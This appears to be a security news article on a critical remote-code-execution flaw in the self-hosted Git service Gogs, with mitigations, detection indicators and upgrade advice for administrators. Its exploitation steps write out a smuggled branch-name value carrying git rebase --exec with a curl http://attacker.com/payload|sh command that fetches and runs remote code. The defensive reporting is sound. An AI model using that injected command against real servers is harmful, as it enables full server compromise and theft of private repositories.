Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code
#Vulnerabilities

Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code

Security Reporter
4 min read

A newly disclosed flaw in the self‑hosted Git service Gogs enables any logged‑in user to run arbitrary commands on the server by exploiting the rebase‑before‑merge feature. The issue scores 9.4 on CVSS, has no public patch yet, and affects Windows, Linux and macOS deployments.

Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code

Featured image

A remote‑code‑execution bug in Gogs – the open‑source Git front‑end many teams run on‑premises – has been assigned a 9.4 CVSS rating by Rapid7. The flaw does not require administrative rights, and it can be triggered by a single malicious pull request.

How the exploit works

Jonah Burgess, a security researcher who discovered the issue, explained the chain in a Rapid7 advisory:

"An authenticated user can create a pull request whose branch name contains the string --exec. When the repository has rebase before merging enabled, Gogs passes the branch name directly to git rebase. The --exec flag tells Git to run a shell command after each commit is replayed, so the attacker’s command is executed on the server."

In practice, the steps are:

  1. Create an account on a Gogs instance that allows public registration.
  2. Create a repository – the owner of a repo is automatically granted full control over it.
  3. Enable rebase merging in the repository settings (a single toggle).
  4. Open a pull request with a branch name such as feature--exec "curl http://attacker.com/payload|sh".
  5. When the maintainer clicks Rebase and merge, Gogs runs git rebase --exec "curl http://attacker.com/payload|sh" …, handing the attacker a shell on the host.

The same technique works for any user who already has write access to a repo where rebase merging is turned on. No interaction from other users is required after the pull request is submitted.

Why it matters

  • Cross‑tenant breach – because Gogs often hosts many projects on a single server, a compromised account can read or alter private repositories belonging to other teams.
  • Full server compromise – the executed command runs with the same privileges as the Gogs process (typically a dedicated git user, but many installations run it as root). An attacker can dump credentials, install persistence, or pivot to other machines on the network.
  • Broad impact – Rapid7 reports that the flaw affects all supported operating systems (Windows, Linux, macOS) and any default‑configured instance. Their scan identified over 1,100 internet‑facing Gogs deployments, and many more are likely hidden behind VPNs or internal firewalls.

Immediate mitigation steps

The Gogs maintainers have not released a patch as of this writing. Until an official fix arrives, administrators can reduce the attack surface with the following configuration changes in app.ini:

  • Disable open registration – set DISABLE_REGISTRATION = true to stop unknown users from creating accounts.
  • Block repository creation – set MAX_CREATION_LIMIT = 0 to prevent new repos from being added by untrusted users.
  • Turn off rebase merging – either globally (ENABLE_REBASE_MERGE = false) or per repository via the UI. This removes the git rebase path that the exploit relies on.
  • Enforce strong authentication – require two‑factor authentication for all accounts and rotate any tokens that may have been issued.
  • Audit logs – look for HTTP 500 responses during merge operations; they can indicate a failed exploit attempt.

Detecting abuse

Rapid7 has published a Metasploit module that automates the full exploit chain for both Linux and Windows targets. Security teams can use the module in a controlled lab to generate Indicators of Compromise (IOCs) such as:

  • Unexpected git rebase processes with --exec arguments in the process list.
  • New repositories that appear and disappear within minutes (the module creates a temporary repo, runs the payload, then deletes it).
  • HTTP 500 status codes in the Gogs access logs during merge actions.

Deploying a simple rule in your SIEM that flags any git rebase command containing --exec is an effective early warning.

Long‑term recommendations

  • Upgrade to the latest Gogs release as soon as a fix is published. The maintainers have indicated a patch is in preparation.
  • Isolate the Gogs service in its own container or VM with minimal privileges. Even if an attacker gains code execution, the damage is limited to that environment.
  • Apply the principle of least privilege to the Gogs system user – avoid running the service as root.
  • Regularly review repository settings across all projects to ensure rebase merging is only enabled where absolutely necessary.
  • Consider alternative Git platforms that provide built‑in protection against branch‑name injection, such as GitLab or Gitea, if you cannot enforce the above mitigations.

What to watch next

Rapid7’s advisory will be updated once a CVE identifier is assigned and a patch is released. Keep an eye on the official Gogs GitHub page and the project's issue tracker for the latest status.

If you manage a Gogs instance, apply the configuration changes today, monitor your logs for the described IOCs, and plan for a rapid upgrade once the fix lands.

#Gogs#RCE#Git#Vulnerability#Server

Comments

Loading comments...
Back to Home